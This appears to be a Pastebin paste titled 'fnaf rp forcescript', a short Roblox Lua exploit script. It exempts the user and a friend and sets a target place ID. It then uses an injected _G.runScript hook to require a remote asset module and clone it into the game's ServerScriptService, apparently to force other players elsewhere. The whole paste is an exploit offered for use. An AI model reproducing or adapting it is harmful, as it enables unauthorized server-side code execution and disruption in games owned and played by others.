Advertisement
Upscalefanatic3

fnaf rp forcescript

Nov 18th, 2016
421
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.47 KB | None | 0 0
  1.  
  2. me = game:GetService("Players").LocalPlayer
  3. excludelist = {me.Name, "otherfriendnamehere"}
  4. for i,v in pairs(excludelist) do
  5. plr = game:GetService("Players"):FindFirstChild(v)
  6. if plr then
  7. nope = Instance.new("Model", plr)
  8. nope.Name = "ExceptionHax"
  9. end
  10. end
  11. place = Instance.new("IntValue", game:GetService("Lighting"))
  12. place.Value = 184844919 --your place id here
  13. place.Name = "PlaceHax"
  14. wait(1)
  15. _G.runScript("require(518616824):Clone().Parent = game.ServerScriptService")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement